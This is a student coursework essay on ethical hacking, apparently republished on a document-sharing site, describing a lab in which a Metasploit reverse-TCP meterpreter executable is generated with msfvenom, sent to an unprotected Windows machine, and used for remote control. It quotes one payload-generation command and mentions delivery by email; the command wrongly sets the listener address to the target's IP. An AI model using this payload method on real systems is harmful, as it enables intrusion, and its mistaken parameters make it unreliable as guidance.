Kali Linux Exploit using Metasploit for Windows OS

Verified

Added on 2023/06/05

AI Summary

This article explains how to use Kali Linux Metasploit exploit to penetrate Windows OS. The attacker can get full control of the victim's machine and carry out several operations. The article provides step-by-step instructions and requirements for the test.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

ICT ETHICAL HACKING (EXPLOITS) 2
In the workshop, we came up with Kali Linux Metasploit exploit whose target would
mainly be on the windows operating systems (windows XP, 7, 8, 8.1 and 10). This exploit would
enable an attacker get into the victim’s machine and do a number of operations just as if logged
in. metasploit is basically a project that helps in penetration testing and development of ID
signatures. The tool helps in the development of an exploit code as well as its execution in a
targeted remote machine (Dieterle, 2016).
For this test our requirements were; a metasploit framework with the entire Ruby
packages which we installed in a Kali Linux Operating system computer, two machines, one
with a windows operating system and another with a Kali Linux OS. The two machines were
allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we
ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik,
Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our
penetration test was the Msfconsole simply because of its flexibility and other additional features
which supported the tools within the framework.
For us to be in a position to penetrate into the second machine which was operating on a
windows platform, we first had to be aware of the machine’s IP address and one of its free PORT
numbers which we easily acquired considering that the two machines were operating in the same
network. An IP address of a machine operating within the same network can be obtained easily
using software called Netcut (Muniz, 2013).
Now to get a chance of penetrating into the second machine, we first of all created an executable
file within the Kali Linux platform under the IP address and PORT number specification of the
second machine using the command “msfvenom –p windows/meterpreter/reverse_tcp LHOST=

ICT ETHICAL HACKING (EXPLOITS) 3
(IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e
x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”
The command allowed us to create an executable folder in the Kali Linux platform and
which contained several .exe files. This is the collection of files which we were supposed to send
to the target machine through channels line mail or else through the network (Pritchett & De
Smet, 2013).
After we send the file to the target machine, we were entitled to activate our metasploit
framework into a listening status using the “exploit” command at the Msfconsole handler status.
So, when it’s set on a listening mode, it waits until the file send to the victim machine is opened.
When the file sent to the victim machine is eventually opened by the victim, on the side of Kali
Linux platform “meterpreter” activates itself automatically.
At this juncture, the attacker is inside the victim’s machine and can carry out several
operations with full control just like a person who has logged into the system physically. Some
of the activities the attacker can do on the victim’s machine include reading the contents of the
files on the screen, changing directories, editing files, deleting files, searching for files,
uploading files changing local directories, printing local directories, removing directories,
moving source to destination, and printing working directories (Weidman, 2014). This implies
that the attacker has already hacked into the victim’s computer.
References
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent
Publishing Platform.

ICT ETHICAL HACKING (EXPLOITS) 4
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective
penetration testing with Metasploit framework and methodologies. In Computational
Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp.
237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.

1 out of 4

+13062052269

info@desklib.com

Kali Linux Exploit using Metasploit for Windows OS

Contribute Materials

Secure Best Marks with AI Grader

Related Documents

Kali Linux Exploit using Metasploit

Kali Linux Exploit using Metasploit for Ethical Hacking

Kali Linux Exploit using Metasploit

Kali Linux Exploit using Metasploit for Windows OS

Penetration Testing on Linux Machine: Task 3

ICT Ethical Hacking